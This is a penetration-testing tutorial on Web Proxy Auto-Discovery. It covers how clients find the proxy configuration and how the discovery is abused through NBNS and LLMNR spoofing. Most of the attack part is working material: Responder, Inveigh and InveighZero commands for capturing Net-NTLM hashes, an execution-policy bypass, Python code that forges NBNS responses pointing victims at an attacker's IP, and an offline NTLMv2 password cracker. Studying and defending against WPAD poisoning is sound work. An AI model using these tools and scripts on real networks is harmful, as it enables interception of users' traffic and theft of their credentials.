Introduction to WPAD
WPAD stands for Web Proxy Auto-Discovery Protocol. It lets a browser locate its proxy configuration (PAC) file automatically, download it, run the JavaScript it contains (the FindProxyForURL function) and then route its web traffic through whatever proxy the script returns, all without the user configuring anything.
WPAD principle
When a user opens a web page, the browser first looks for the location of the PAC file. It tries the following methods in order:
- DHCP: the browser sends a DHCP INFORM to the DHCP server asking for the PAC file location (DHCP option 252); the server replies with a DHCP ACK that carries the PAC URL.
- DNS: the browser asks the DNS server for the host named wpad in its own DNS suffix (for example wpad.corp.example.com). The DNS server returns the IP address of the WPAD host and the browser downloads wpad.dat from port 80 of that IP.
- NBNS: if DNS gives no answer, the browser falls back to NetBIOS name resolution and broadcasts a name query for WPAD on UDP port 137; whichever host answers is treated as the WPAD server.
Supplementary notes:
1. Windows 2000, XP and Server 2003 only support the DNS and NetBIOS methods.
2. Windows Vista and later (including Server 2008, Windows 7, 8.x and 10) support DNS, NBNS and LLMNR.
3. If neither DHCP nor DNS answers and the name is not in the local name cache, a system that supports LLMNR (Link-Local Multicast Name Resolution) first sends a multicast LLMNR query. If that gets no response it broadcasts an NBNS query. If any host answers either query with a PAC file location, the browser downloads wpad.dat from port 80 of the IP that host supplied.
WPAD vulnerability
Given the discovery order above, the victim's last resort is a broadcast NBNS (or multicast LLMNR) query that every host on the segment can see. An attacker who answers it first with a forged response pointing at their own IP becomes the WPAD server: the victim downloads the attacker's wpad.dat, sends its web traffic through the attacker's proxy, and can be forced to authenticate to it. That hands the attacker control over the user's sessions and the user's Net-NTLM challenge-response for cracking or relaying.
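To make the exchange concrete, here is an added example (not code from the original article or from Responder) that builds the NBNS name query a victim broadcasts for WPAD, the positive name query response a poisoner answers with, and the parsing a victim's NetBIOS stack performs on it. Packet layouts follow RFC 1002; the transaction ID 0xBEEF, the attacker address 10.0.0.5 and the host names are constructed values for this example.

```python
# Added example, not code from the original article or from Responder.
# NBNS (RFC 1002) name query and positive name query response for WPAD.
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020
QCLASS_IN = 0x0001

def encode_nb_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: pad the name to 15 chars, append the service
    suffix byte, then write each nibble as a letter 'A'..'P' (32 chars)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    encoded = bytearray()
    for byte in raw:
        encoded.append(ord("A") + (byte >> 4))
        encoded.append(ord("A") + (byte & 0x0F))
    return b"\x20" + bytes(encoded) + b"\x00"   # length byte, label, root

def decode_nb_name(label: bytes) -> tuple:
    """Reverse first-level encoding of a 32-char label; returns (name, suffix)."""
    raw = bytes(((label[i] - ord("A")) << 4) | (label[i + 1] - ord("A"))
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]

def build_nbns_query(tid: int, name: str) -> bytes:
    """What the victim broadcasts to 255.255.255.255:137 once DHCP and DNS
    gave it no WPAD location. Flags 0x0110 = query, broadcast, recursion desired."""
    header = struct.pack(">HHHHHH", tid, 0x0110, 1, 0, 0, 0)
    return header + encode_nb_name(name) + struct.pack(">HH", QTYPE_NB, QCLASS_IN)

def build_spoofed_response(query: bytes, attacker_ip: str, ttl: int = 300000) -> bytes:
    """What a poisoner sends back: the victim's transaction ID and name, flags
    0x8500 (response, authoritative), one NB answer record with the attacker's IP."""
    tid = struct.unpack(">H", query[:2])[0]
    question_name = query[12:46]                 # length byte + 32 chars + root
    header = struct.pack(">HHHHHH", tid, 0x8500, 0, 1, 0, 0)
    nb_flags = 0x0000                            # B-node, unique name
    rdata = struct.pack(">H", nb_flags) + bytes(int(o) for o in attacker_ip.split("."))
    answer = question_name + struct.pack(">HHIH", QTYPE_NB, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + answer

def parse_nbns_response(pkt: bytes) -> dict:
    """Parse a positive name query response into tid, name, suffix, ttl and ip."""
    tid, flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a name query response")
    name, suffix = decode_nb_name(pkt[13:45])
    rr_type, _rr_class, ttl, rdlen = struct.unpack(">HHIH", pkt[46:56])
    if rr_type != QTYPE_NB or rdlen < 6:
        raise ValueError("unexpected answer record")
    ip = ".".join(str(b) for b in pkt[58:62])
    return {"tid": tid, "name": name, "suffix": suffix, "ttl": ttl, "ip": ip}

def victim_accepts(query: bytes, response: bytes) -> bool:
    """All the victim can match is the transaction ID and the name it asked for.
    Both were just broadcast, so any host on the segment can satisfy this check."""
    parsed = parse_nbns_response(response)
    qtid = struct.unpack(">H", query[:2])[0]
    qname, _ = decode_nb_name(query[13:45])
    return parsed["tid"] == qtid and parsed["name"] == qname

if __name__ == "__main__":
    query = build_nbns_query(0xBEEF, "WPAD")          # victim side
    spoofed = build_spoofed_response(query, "10.0.0.5")  # poisoner side
    print(parse_nbns_response(spoofed), victim_accepts(query, spoofed))
```

The function to look at is victim_accepts: the only things a responder has to get right are the transaction ID and the encoded name, and both were broadcast to every host on the segment moments earlier. That is why Responder and Inveigh need no prior foothold; whoever answers first wins, and when no legitimate WPAD host exists there is nobody to race against.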
WPAD Spoof
Responder
Responder is used below to carry out the NBNS spoofing attack:
Step 1: Run Responder with the following parameters to perform WPAD spoofing (-I selects the interface, -w starts the rogue WPAD proxy, -F forces NTLM authentication when wpad.dat is requested)
./Responder.py -I eth0 -w -F
Step 2: When the victim opens a browser (with no cached WPAD session), the browser fetches wpad.dat from the rogue server and is forced to authenticate once
Step 3: Responder captures the user's Net-NTLM hash
Inveigh implementation
Inveigh download address: https://github.com/Kevin-Robertson/Inveigh
Step 1: Open PowerShell on the attacking machine as administrator and run the following commands in order
. .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y
# PS: if the execution policy blocks the script, first run Set-ExecutionPolicy Bypass -Scope Process
Inveigh's LLMNR spoofer is on by default; if the version you use leaves the NBNS spoofer off, add -NBNS Y to the Invoke-Inveigh line so that broadcast NBNS queries for WPAD are answered as well.
Step 2: When the user opens the browser (with no cached session), WPAD authentication is triggered automatically, and the page will not load until the user authenticates
Step 3: The user's Net-NTLM hash is captured
InveighZero
Project address: https://github.com/Kevin-Robertson/InveighZero
Step 1: Open cmd on the attacking machine with administrator rights and run the following command
Inveigh.exe
Step 2: The next time the victim's browser performs WPAD discovery, it is prompted to authenticate
Step 3: The user's Net-NTLM hash is captured
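Each of the three procedures ends with a captured "Net-NTLM hash", and it is worth being precise about what that is. It is not the user's NT hash but an NTLMv2 challenge-response that the browser computed for the rogue proxy, so it cannot be replayed in a pass-the-hash attack; it can only be cracked offline or relayed. The following added example (not code from the article, from Responder or from Inveigh) recomputes the NTLMv2 proof the way a Windows client does and checks candidate passwords against a captured line in the hashcat 5600 layout Responder writes to its log files (USER::DOMAIN:ServerChallenge:NTProofStr:Blob). The user alice, domain CORP, password, client challenge and timestamp are constructed values; the server challenge 1122334455667788 is the fixed value Responder uses by default. MD4 is implemented inline because hashlib's md4 is missing on many OpenSSL 3 builds.

```python
# Added example, not code from the original article or from Responder/Inveigh.
# Recompute an NTLMv2 proof (MS-NLMP) and test candidates against a captured
# line in the hashcat 5600 layout USER::DOMAIN:ServerChallenge:NTProofStr:Blob.
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hashes need it and hashlib often lacks it."""
    def rol(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = h[:]
        for i in range(48):
            a, b, c, d = v
            rnd, j = divmod(i, 16)
            if rnd == 0:
                f, k, s, K = (b & c) | (~b & d), j, (3, 7, 11, 19)[j % 4], 0
            elif rnd == 1:
                f, k, s, K = ((b & c) | (b & d) | (c & d), (j % 4) * 4 + j // 4,
                              (3, 5, 9, 13)[j % 4], 0x5A827999)
            else:
                f, k, s, K = (b ^ c ^ d, (0, 2, 1, 3)[j // 4] + (0, 8, 4, 12)[j % 4],
                              (3, 9, 11, 15)[j % 4], 0x6ED9EBA1)
            v = [d, rol((a + f + X[k] + K) & MASK, s), b, c]
        h = [(x + y) & MASK for x, y in zip(h, v)]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). The rogue proxy never sees this value."""
    return md4(password.encode("utf-16-le"))

def ntlmv2_proof(password: str, user: str, domain: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed with NTOWFv2 over challenge || blob,
    where NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) || domain))."""
    ntowf_v2 = hmac.new(nt_hash(password),
                        (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()

def build_blob(client_challenge: bytes, timestamp: bytes, nb_domain: str) -> bytes:
    """Constructed NTLMv2_CLIENT_CHALLENGE ('temp'): resp types 1/1, reserved,
    FILETIME, 8-byte client nonce, reserved, AV pairs (MsvAvNbDomainName + EOL)."""
    av = struct.pack("<HH", 0x0002, len(nb_domain) * 2) + nb_domain.encode("utf-16-le")
    av += struct.pack("<HH", 0x0000, 0)          # MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + timestamp + client_challenge
            + b"\x00" * 4 + av + b"\x00" * 4)

def client_response_line(user, domain, password, server_challenge, blob) -> str:
    """What the victim's browser effectively hands the rogue proxy, written in
    the hashcat 5600 layout that Responder logs."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"

def crack_line(line: str, candidates):
    """Offline check of a captured line: recompute NTProofStr for each candidate
    and return the first password that reproduces it, or None."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    chal, proof, blob = (bytes.fromhex(chal_hex), bytes.fromhex(proof_hex),
                         bytes.fromhex(blob_hex))
    for cand in candidates:
        if hmac.compare_digest(ntlmv2_proof(cand, user, domain, chal, blob), proof):
            return cand
    return None

# Constructed capture: victim "alice" in domain CORP authenticating to the rogue
# WPAD proxy; the server challenge is Responder's default fixed value.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
CAPTURED_LINE = client_response_line(
    "alice", "CORP", "Summer2024!", SERVER_CHALLENGE,
    build_blob(bytes.fromhex("0102030405060708"), b"\x00" * 8, "CORP"))

if __name__ == "__main__":
    print(CAPTURED_LINE)
    print("cracked:", crack_line(CAPTURED_LINE, ["Password1", "Winter2023", "Summer2024!"]))
```

Two things follow from the code. Because the proof is an HMAC over the server challenge, a fixed challenge such as Responder's default does not weaken the user's password, but it does make captured lines trivially attributable to the tool, which is one signature defenders look for. And because the client challenge and timestamp sit inside the blob, every capture of the same user yields a different line; cracking still costs one HMAC-MD5 chain per candidate per line, which is why weak passwords fall quickly to hashcat mode 5600.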
Reference link
https://max.book118.com/html/2017/1101/138462395.shtm
Extension at the end of the article
Intranet penetration tools are updated continuously; when the opportunity arises we will also demonstrate and share how to use some of them in a lab environment:
https://github.com/Al1ex/Pentest-tools
The remaining man-in-the-middle techniques will be added later~
Preview of the next issue: a detailed explanation of AD CS Relay (a belated article, I did not have time to post it before, so I will add it later)~